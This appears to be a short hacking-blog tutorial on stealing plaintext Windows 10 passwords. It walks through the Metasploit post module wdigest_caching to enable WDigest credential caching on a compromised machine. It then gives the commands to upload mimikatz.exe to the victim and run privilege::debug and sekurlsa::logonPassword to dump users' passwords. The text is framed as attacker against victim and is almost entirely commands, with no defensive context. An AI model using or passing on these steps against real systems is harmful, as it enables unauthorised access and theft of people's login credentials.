Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider’s Registry key. Any subsequest logins will allow mimikatz to recover the plain text passwords from the system’s memory.

Exploit Targets

Windows 10

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use post/windows/manage/wdigest_caching

msf exploit (wdigest_caching)>set session 1

msf exploit (wdigest_caching)>exploit

To send mimikatz file to the target system using following command

Upload /usr/share/mimikatz/x64/mimikatz.exe e:\\

Type the following command to check privilege

privilege::debug

 Then type the following command to get users passwords in text mode.

sekurlsa::logonPassword

Leave a Reply

Your email address will not be published. Required fields are marked *